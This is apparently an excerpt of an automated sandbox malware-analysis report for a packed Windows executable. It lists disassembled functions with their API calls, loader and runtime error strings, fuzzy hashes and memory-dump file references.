String ID: Failed to create symbolic link %s!$Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc
API String ID: 2030045667-1550345328
Opcode ID: d70d77859ce4cd26aee71117bdc994a99ad33a2fc884273708e58e418250d0be
Instruction ID: 00c4444d75a7bfdf61dccc0a815bbe355591a298c757a8cc661feb79e62edf0a
Opcode Fuzzy Hash: d70d77859ce4cd26aee71117bdc994a99ad33a2fc884273708e58e418250d0be
Instruction Fuzzy Hash: 4E519A61B08642D2EA18BF61B9001B9A3B0BF44B94FE44131EE1D87FD5EE3CE955C720

Function 00007FF7691A77D0 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 115COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7691A86B0: MultiByteToWideChar.KERNEL32(?,?,?,00007FF7691A3FA4,00000000,00007FF7691A1925), ref: 00007FF7691A86E9

ExpandEnvironmentStringsW.KERNEL32(?,00007FF7691A7C97,?,?,FFFFFFFF,00007FF7691A3834), ref: 00007FF7691A782C

Part of subcall function 00007FF7691A26C0: MessageBoxW.USER32 ref: 00007FF7691A2736

Strings

LOADER: failed to expand environment variables in the runtime-tmpdir., xrefs: 00007FF7691A7840
\, xrefs: 00007FF7691A7861
LOADER: failed to convert runtime-tmpdir to a wide string., xrefs: 00007FF7691A7803
CreateDirectory, xrefs: 00007FF7691A7974
%.*s, xrefs: 00007FF7691A790C
LOADER: failed to create runtime-tmpdir path %ls!, xrefs: 00007FF7691A796D
LOADER: failed to obtain the absolute path of the runtime-tmpdir., xrefs: 00007FF7691A78D9
LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!, xrefs: 00007FF7691A789D

Memory Dump Source

Source File: 00000001.00000002.1718792288.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true

Associated: 00000001.00000002.1718771841.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718819453.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718843961.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718843961.00007FF7691E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718881280.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7691a0000_VaTlw2kNGc.jbxd

Similarity

API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
String ID: %.*s$CreateDirectory$LOADER: failed to convert runtime-tmpdir to a wide string.$LOADER: failed to create runtime-tmpdir path %ls!$LOADER: failed to expand environment variables in the runtime-tmpdir.$LOADER: failed to obtain the absolute path of the runtime-tmpdir.$LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!$\
API String ID: 1662231829-930877121
Opcode ID: 5adf1a7b4f365c991e592d6daa758356e56cb82b092043d5b28c068608273831
Instruction ID: 3ec37d6ba19b5a3505ac5e70bc2439cd57e8d762e2278291e358dffc35c70231
Opcode Fuzzy Hash: 5adf1a7b4f365c991e592d6daa758356e56cb82b092043d5b28c068608273831
Instruction Fuzzy Hash: BB419711F1D643C1FA59BF25F8516B9E271AF44790FE44433D64E82E99EE2CE904C760

Function 00007FFE1330A83C Relevance: 22.9, APIs: 15, Instructions: 358COMMONLIBRARYCODE

Download Yara Rule

APIs

DName::operator+.LIBVCRUNTIME ref: 00007FFE1330A88D
DName::operator+.LIBVCRUNTIME ref: 00007FFE1330A969
DName::operator+.LIBVCRUNTIME ref: 00007FFE1330A9B2
DName::operator+.LIBVCRUNTIME ref: 00007FFE1330A9C3

Memory Dump Source

Source File: 00000001.00000002.1718925987.00007FFE13301000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE13300000, based on PE: true

Associated: 00000001.00000002.1718901593.00007FFE13300000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1718946641.00007FFE13311000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1718966930.00007FFE13316000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1718983953.00007FFE13317000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffe13300000_VaTlw2kNGc.jbxd

Similarity

API ID: Name::operator+
String ID:
API String ID: 2943138195-0
Opcode ID: 63ad456de8db332c0b347e2e514b887ab112aaee213ccda8367cb7f767930e9c
Instruction ID: b0e19649e05d6378c33ba4604b14863f2ee39d1620a57cacc7a5842a360d4acd
Opcode Fuzzy Hash: 63ad456de8db332c0b347e2e514b887ab112aaee213ccda8367cb7f767930e9c
Instruction Fuzzy Hash: BCF18D72B08A829EF711DF66E4901EC37B0EB2435CB4041B5EE6D67AA5DF38D906C348

Function 00007FFE1330D20C Relevance: 21.3, APIs: 7, Strings: 5, Instructions: 349COMMONLIBRARYCODE

Download Yara Rule

APIs

DName::operator+.LIBVCRUNTIME ref: 00007FFE1330D712

Strings

NULL, xrefs: 00007FFE1330D2D7
`generic-method-parameter-, xrefs: 00007FFE1330D6B7
`template-type-parameter-, xrefs: 00007FFE1330D6D0
`generic-class-parameter-, xrefs: 00007FFE1330D6C7
nullptr, xrefs: 00007FFE1330D3FA

Memory Dump Source

Source File: 00000001.00000002.1718925987.00007FFE13301000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE13300000, based on PE: true

Associated: 00000001.00000002.1718901593.00007FFE13300000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1718946641.00007FFE13311000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1718966930.00007FFE13316000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1718983953.00007FFE13317000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffe13300000_VaTlw2kNGc.jbxd

Similarity

API ID: Name::operator+
String ID: NULL$`generic-class-parameter-$`generic-method-parameter-$`template-type-parameter-$nullptr
API String ID: 2943138195-2309034085
Opcode ID: 767f6b35ed257beddb1ea2fff1390adae3ecab9bc22a75a6672164d643aa4b64
Instruction ID: b2308a5b933c921f35a3c5f6642ebc039545b17a461f419400a242fac59adb50
Opcode Fuzzy Hash: 767f6b35ed257beddb1ea2fff1390adae3ecab9bc22a75a6672164d643aa4b64
Instruction Fuzzy Hash: 7FE1A172E08E028CFB14AB6AD9581BC27E4AF65764F4401B5DE2D36AB9DF3CA544C348

Function 00007FFE13302CE4 Relevance: 19.6, APIs: 8, Strings: 3, Instructions: 309COMMON

Download Yara Rule

APIs

__FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 00007FFE13302D40

Part of subcall function 00007FFE13305010: _GetEstablisherFrame.LIBVCRUNTIME ref: 00007FFE13305045
Part of subcall function 00007FFE13305010: __GetUnwindTryBlock.LIBCMT ref: 00007FFE13305053
Part of subcall function 00007FFE13305010: __SetUnwindTryBlock.LIBVCRUNTIME ref: 00007FFE13305078

Is_bad_exception_allowed.LIBVCRUNTIME ref: 00007FFE13302E18
terminate.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE13302E25
__FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 00007FFE13303060
terminate.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE1330308E
_GetEstablisherFrame.LIBVCRUNTIME ref: 00007FFE133030CC

Part of subcall function 00007FFE13306710: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FFE1330239E), ref: 00007FFE1330671E

abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE13303154
std::bad_alloc::bad_alloc.LIBCMT ref: 00007FFE13303189

Strings

csm, xrefs: 00007FFE13302E3D
csm, xrefs: 00007FFE13302DC1
csm, xrefs: 00007FFE13302D5A

Memory Dump Source

Source File: 00000001.00000002.1718925987.00007FFE13301000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE13300000, based on PE: true

Associated: 00000001.00000002.1718901593.00007FFE13300000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1718946641.00007FFE13311000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1718966930.00007FFE13316000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1718983953.00007FFE13317000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffe13300000_VaTlw2kNGc.jbxd

Similarity

API ID: Frame$BlockEstablisherHandler3::Unwindabortterminate$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 3436797354-393685449
Opcode ID: d5e0e3ab29c15918133307a59fdea49d8ed4f7431b693d67295d57de9f2acebd
Instruction ID: 9f322ceca1445c18d436cd4cfd1ab5055cbc19680d3decd3b1844b37a1ef08d9
Opcode Fuzzy Hash: d5e0e3ab29c15918133307a59fdea49d8ed4f7431b693d67295d57de9f2acebd
Instruction Fuzzy Hash: 48D17432A08F418EEB54DF66D4402AE77A0FB65BA8F100175EE9D67B65CF38E494C704

Function 00007FF7691A20F0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

GetDC.USER32 ref: 00007FF7691A211B
SelectObject.GDI32 ref: 00007FF7691A2162
DrawTextW.USER32 ref: 00007FF7691A2185
SelectObject.GDI32 ref: 00007FF7691A219B
ReleaseDC.USER32 ref: 00007FF7691A21AB
MoveWindow.USER32 ref: 00007FF7691A21FB
MoveWindow.USER32 ref: 00007FF7691A223B
MoveWindow.USER32 ref: 00007FF7691A228E
MoveWindow.USER32 ref: 00007FF7691A22D6

Strings

P%, xrefs: 00007FF7691A216F

Memory Dump Source

Source File: 00000001.00000002.1718792288.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true

Associated: 00000001.00000002.1718771841.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718819453.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718843961.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718843961.00007FF7691E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718881280.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7691a0000_VaTlw2kNGc.jbxd

Similarity

API ID: MoveWindow$ObjectSelect$DrawReleaseText
String ID: P%
API String ID: 2147705588-2959514604
Opcode ID: 028f263e58f42d33d872b22938efc015f71aa7b4c996476cfe5add7d8b08dd36
Instruction ID: 76a5a1673db0565395af148334a9a4b4b0236263a3ba342845590c5ce42888af
Opcode Fuzzy Hash: 028f263e58f42d33d872b22938efc015f71aa7b4c996476cfe5add7d8b08dd36
Instruction Fuzzy Hash: 6D51E7266087A1C6D6389F26B4181BAF7B1F798B62F504121EBDF83684DF3CD045DB20

Function 00007FFE1330E350 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 196COMMONLIBRARYCODE

Download Yara Rule

Strings

`generic-type-, xrefs: 00007FFE1330E491
generic-type-, xrefs: 00007FFE1330E45E
`template-parameter-, xrefs: 00007FFE1330E44A
template-parameter-, xrefs: 00007FFE1330E417

Memory Dump Source

Source File: 00000001.00000002.1718925987.00007FFE13301000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE13300000, based on PE: true

Associated: 00000001.00000002.1718901593.00007FFE13300000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1718946641.00007FFE13311000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1718966930.00007FFE13316000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1718983953.00007FFE13317000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffe13300000_VaTlw2kNGc.jbxd

Similarity

API ID:
String ID: `generic-type-$`template-parameter-$generic-type-$template-parameter-
API String ID: 0-3207858774
Opcode ID: 6f458657f8fae6e2f2557f40169539ea56a3e6fb73d2116d9b83691f1491e61c
Instruction ID: 606cf050714bde27de9d5f03bf3cfc5ab7bce46f87510240db048384b56ec545
Opcode Fuzzy Hash: 6f458657f8fae6e2f2557f40169539ea56a3e6fb73d2116d9b83691f1491e61c
Instruction Fuzzy Hash: 3B91AB32B08E868DFB108B62D4502BC77A0AB64B64F4845B2DE6D233B6DF3CE545D318

Function 00007FFE1330A13C Relevance: 15.9, APIs: 2, Strings: 7, Instructions: 120COMMONLIBRARYCODE

Download Yara Rule

APIs

DName::operator+.LIBVCRUNTIME ref: 00007FFE1330A198

Part of subcall function 00007FFE1330722C: DName::operator+=.LIBVCRUNTIME ref: 00007FFE13307247

DName::operator+.LIBVCRUNTIME ref: 00007FFE1330A2C5

Strings

union , xrefs: 00007FFE1330A2F2
coclass , xrefs: 00007FFE1330A27E
`unknown ecsu', xrefs: 00007FFE1330A164
enum , xrefs: 00007FFE1330A287
cointerface , xrefs: 00007FFE1330A26C
class , xrefs: 00007FFE1330A2DA
struct , xrefs: 00007FFE1330A2E9

Memory Dump Source

Source File: 00000001.00000002.1718925987.00007FFE13301000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE13300000, based on PE: true

Associated: 00000001.00000002.1718901593.00007FFE13300000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1718946641.00007FFE13311000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1718966930.00007FFE13316000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1718983953.00007FFE13317000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffe13300000_VaTlw2kNGc.jbxd

Similarity

API ID: Name::operator+$Name::operator+=
String ID: `unknown ecsu'$class $coclass $cointerface $enum $struct $union
API String ID: 179159573-1464470183
Opcode ID: 2fc61dd6c602e97fa3c1e55ca06bd20aebc659b0b394667bc2b1a0081ee2f141
Instruction ID: afda46302a8321e602c1bcaa81b4c441be55a1a556662d9b258ce46c3c70d297
Opcode Fuzzy Hash: 2fc61dd6c602e97fa3c1e55ca06bd20aebc659b0b394667bc2b1a0081ee2f141
Instruction Fuzzy Hash: 9D517A31E18E26CDFB14CBA6E8405BC33B4BB243A4F500275DE2D76A69DF29E552C704

Function 00007FFE133088E4 Relevance: 15.2, APIs: 10, Instructions: 150COMMONLIBRARYCODE

Download Yara Rule

APIs

DName::operator+.LIBVCRUNTIME ref: 00007FFE133089AE
DName::operator+.LIBVCRUNTIME ref: 00007FFE133089BE
DName::operator+.LIBVCRUNTIME ref: 00007FFE13308A0A
DName::operator+.LIBVCRUNTIME ref: 00007FFE13308A1A
DName::operator+.LIBVCRUNTIME ref: 00007FFE13308A2A
DName::operator+.LIBVCRUNTIME ref: 00007FFE13308A9D
DName::operator+.LIBVCRUNTIME ref: 00007FFE13308AAE
DName::operator+.LIBVCRUNTIME ref: 00007FFE13308AC0
DName::operator+.LIBVCRUNTIME ref: 00007FFE13308AEC
DName::operator+.LIBVCRUNTIME ref: 00007FFE13308AFB

Memory Dump Source

Source File: 00000001.00000002.1718925987.00007FFE13301000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE13300000, based on PE: true

Associated: 00000001.00000002.1718901593.00007FFE13300000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1718946641.00007FFE13311000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1718966930.00007FFE13316000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1718983953.00007FFE13317000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffe13300000_VaTlw2kNGc.jbxd

Similarity

API ID: Name::operator+
String ID:
API String ID: 2943138195-0
Opcode ID: 28d39e64d2900046752fe00e0d170ae61e4b908a297697eb59c3c366de5be272
Instruction ID: e01e4476c5e825f3442993bf085f1a7e018441999e41eb8f17180454eea1f972
Opcode Fuzzy Hash: 28d39e64d2900046752fe00e0d170ae61e4b908a297697eb59c3c366de5be272
Instruction Fuzzy Hash: 51618A62F04B529CFB00DBA2D8801EC27B1BB107A8F404476DE6D3BAA9DF78D545C344

Function 00007FF7691B55A0 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 494COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7691B55E3
_invalid_parameter_noinfo.LIBCMT ref: 00007FF7691B59D0
_invalid_parameter_noinfo.LIBCMT ref: 00007FF7691B5C6C

Strings

p, xrefs: 00007FF7691B570D
p, xrefs: 00007FF7691B5695
-, xrefs: 00007FF7691B5679
:, xrefs: 00007FF7691B579C
f, xrefs: 00007FF7691B5705

Memory Dump Source

Source File: 00000001.00000002.1718792288.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true

Associated: 00000001.00000002.1718771841.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718819453.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718843961.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718843961.00007FF7691E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718881280.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7691a0000_VaTlw2kNGc.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: -$:$f$p$p
API String ID: 3215553584-2013873522
Opcode ID: 6485ef080591767760fe67f9caec812fff4e1ba5c20858478bd9f0fbec74de2f
Instruction ID: 5e1f2c9175aad29784a9285a4fbde8ee966cf1edc5fe99522353df13bd9068bd
Opcode Fuzzy Hash: 6485ef080591767760fe67f9caec812fff4e1ba5c20858478bd9f0fbec74de2f
Instruction Fuzzy Hash: 34128162A08243C6FB68BF15F154279F673FB40754FE44136D69A866CCDB3CE9908B24

Function 00007FF7691B02E8 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 475COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7691B0328
_invalid_parameter_noinfo.LIBCMT ref: 00007FF7691B06F0
_invalid_parameter_noinfo.LIBCMT ref: 00007FF7691B098F

Strings

f, xrefs: 00007FF7691B03C0
p, xrefs: 00007FF7691B0432
f, xrefs: 00007FF7691B0575
p, xrefs: 00007FF7691B03CD
f, xrefs: 00007FF7691B042A

Memory Dump Source

Source File: 00000001.00000002.1718792288.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true

Associated: 00000001.00000002.1718771841.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718819453.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718843961.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718843961.00007FF7691E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718881280.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7691a0000_VaTlw2kNGc.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: f$f$p$p$f
API String ID: 3215553584-1325933183
Opcode ID: 47a7a6303f50c331757a7ed503f6ccc132970c05c2223996d06c8e5714df85c4
Instruction ID: f19603c7e64af85dfceb716c266e3bccffdf2a7e8516f712b8c0d46b6fa7cf23
Opcode Fuzzy Hash: 47a7a6303f50c331757a7ed503f6ccc132970c05c2223996d06c8e5714df85c4
Instruction Fuzzy Hash: EB125062E0D143C6FB28BE15B254779E6B3FB80754FE84036D699466CCDB7CE9808B60

Function 00007FFE133031A0 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 314COMMON

Download Yara Rule

APIs

Is_bad_exception_allowed.LIBVCRUNTIME ref: 00007FFE1330333E
terminate.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE1330334B

Part of subcall function 00007FFE13306710: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FFE1330239E), ref: 00007FFE1330671E

terminate.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE133035F9
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE13303644
std::bad_alloc::bad_alloc.LIBCMT ref: 00007FFE13303679

Strings

csm, xrefs: 00007FFE13303285
csm, xrefs: 00007FFE133032E7
csm, xrefs: 00007FFE13303367

Memory Dump Source

Source File: 00000001.00000002.1718925987.00007FFE13301000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE13300000, based on PE: true

Associated: 00000001.00000002.1718901593.00007FFE13300000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1718946641.00007FFE13311000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1718966930.00007FFE13316000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1718983953.00007FFE13317000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffe13300000_VaTlw2kNGc.jbxd

Similarity

API ID: abortterminate$Is_bad_exception_allowedstd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 211107550-393685449
Opcode ID: 1f2c6e9c8ad6c1917ecaa8d6efe9c468c91fc9baef10e6d9588306a72b9f3ebc
Instruction ID: 5b4014f580c43b88c61bdcf58b40691fa99d85ee5380e304aa17ceaa4bb1543a
Opcode Fuzzy Hash: 1f2c6e9c8ad6c1917ecaa8d6efe9c468c91fc9baef10e6d9588306a72b9f3ebc
Instruction Fuzzy Hash: 20E1C372A08A818EE750DF7AD4803AE77A0FB64B78F140175DAAD67765CF38E085C704

Function 00007FFE1330BE24 Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 111COMMONLIBRARYCODE

Download Yara Rule

APIs

DName::operator+.LIBVCRUNTIME ref: 00007FFE1330BFD8

Part of subcall function 00007FFE13308C24: DName::operator+.LIBVCRUNTIME ref: 00007FFE1330913D
Part of subcall function 00007FFE13308C24: DName::operator+.LIBVCRUNTIME ref: 00007FFE13309175

DName::operator+.LIBVCRUNTIME ref: 00007FFE1330BF8A

Strings

cli::pin_ptr<, xrefs: 00007FFE1330BFA1
void, xrefs: 00007FFE1330BE6E
std::nullptr_t , xrefs: 00007FFE1330BF16
void , xrefs: 00007FFE1330BE96
std::nullptr_t, xrefs: 00007FFE1330BF03
cli::array<, xrefs: 00007FFE1330BF57

Memory Dump Source

Source File: 00000001.00000002.1718925987.00007FFE13301000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE13300000, based on PE: true

Associated: 00000001.00000002.1718901593.00007FFE13300000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1718946641.00007FFE13311000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1718966930.00007FFE13316000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1718983953.00007FFE13317000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffe13300000_VaTlw2kNGc.jbxd

Similarity

API ID: Name::operator+
String ID: cli::array<$cli::pin_ptr<$std::nullptr_t$std::nullptr_t $void$void
API String ID: 2943138195-2239912363
Opcode ID: e2dcc5ac231621b7bb9adceaede0f9dd180f9bba2b8fff5e7c5622460418e45f
Instruction ID: ecff60bcfbdd1f009dca05d3a01a3681d4c46eb00fc70ca211c09ee6bece37f6
Opcode Fuzzy Hash: e2dcc5ac231621b7bb9adceaede0f9dd180f9bba2b8fff5e7c5622460418e45f
Instruction Fuzzy Hash: BC514972E18F458CFB198FA2E8412BC77B0BB28764F4441B5DA6D22AA5DF7C9144C718

Function 00007FF7691A1050 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 111COMMON

Download Yara Rule

Strings

Failed to extract %s: failed to seek to the entry's data!, xrefs: 00007FF7691A10C5
malloc, xrefs: 00007FF7691A10FC
fread, xrefs: 00007FF7691A11D7
fseek, xrefs: 00007FF7691A10CC
Failed to extract %s: failed to open archive file!, xrefs: 00007FF7691A1097
Failed to extract %s: failed to allocate data buffer (%u bytes)!, xrefs: 00007FF7691A10F5
Failed to extract %s: failed to read data chunk!, xrefs: 00007FF7691A11D0

Memory Dump Source

Source File: 00000001.00000002.1718792288.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true

Associated: 00000001.00000002.1718771841.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718819453.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718843961.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718843961.00007FF7691E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718881280.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7691a0000_VaTlw2kNGc.jbxd

Similarity

API ID: Message
String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
API String ID: 2030045667-3659356012
Opcode ID: ae84da08143089e60ea32d7eb7b7e7c5018d8cc8e587b31aa60bcf4a1b821e90
Instruction ID: dbb8be42ad3c6ab9ee10c9e73587333f48a04fe616b30de97dba3e62b82e7663
Opcode Fuzzy Hash: ae84da08143089e60ea32d7eb7b7e7c5018d8cc8e587b31aa60bcf4a1b821e90
Instruction Fuzzy Hash: E6415121B08646C2EA28BF22B9405BAE3B1BF54BC4FE44431DD5E47F95DE3CE9058750

Function 00007FF7691A7FC0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 89processsynchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7691A86B0: MultiByteToWideChar.KERNEL32(?,?,?,00007FF7691A3FA4,00000000,00007FF7691A1925), ref: 00007FF7691A86E9

SetConsoleCtrlHandler.KERNEL32(?,00007FF7691A39C0), ref: 00007FF7691A800A
GetStartupInfoW.KERNEL32(?,00007FF7691A39C0), ref: 00007FF7691A802B

Part of subcall function 00007FF7691B978C: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7691B97A0

Part of subcall function 00007FF7691B7A2C: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7691B7A93

GetCommandLineW.KERNEL32(?,00007FF7691A39C0), ref: 00007FF7691A80CD
CreateProcessW.KERNEL32 ref: 00007FF7691A810F
WaitForSingleObject.KERNEL32(?,00007FF7691A39C0), ref: 00007FF7691A8123
GetExitCodeProcess.KERNEL32 ref: 00007FF7691A8133

Strings

Failed to create child process!, xrefs: 00007FF7691A813F
CreateProcessW, xrefs: 00007FF7691A8146

Memory Dump Source

Source File: 00000001.00000002.1718792288.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true

Associated: 00000001.00000002.1718771841.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718819453.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718843961.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718843961.00007FF7691E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718881280.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7691a0000_VaTlw2kNGc.jbxd

Similarity

API ID: Process_invalid_parameter_noinfo$ByteCharCodeCommandConsoleCreateCtrlExitHandlerInfoLineMultiObjectSingleStartupWaitWide
String ID: CreateProcessW$Failed to create child process!
API String ID: 2895956056-699529898
Opcode ID: 2d8580ce5d81a01d0f8683f73fef31206a84e7faf833a053d17f215ed92b6c27
Instruction ID: 80f10013f5adadd07f0faabdc45a136860996e77bc39537f9d07cbdcaac1c13e
Opcode Fuzzy Hash: 2d8580ce5d81a01d0f8683f73fef31206a84e7faf833a053d17f215ed92b6c27
Instruction Fuzzy Hash: 58412032A08781C5DA24AF24F4552AAB3B1FB88364FA40335E6AD47BD9DF7CD445CB50

Function 00007FF7691ADD28 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON

Download Yara Rule

APIs

__FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 00007FF7691ADD85

Part of subcall function 00007FF7691AECDC: __GetUnwindTryBlock.LIBCMT ref: 00007FF7691AED1F
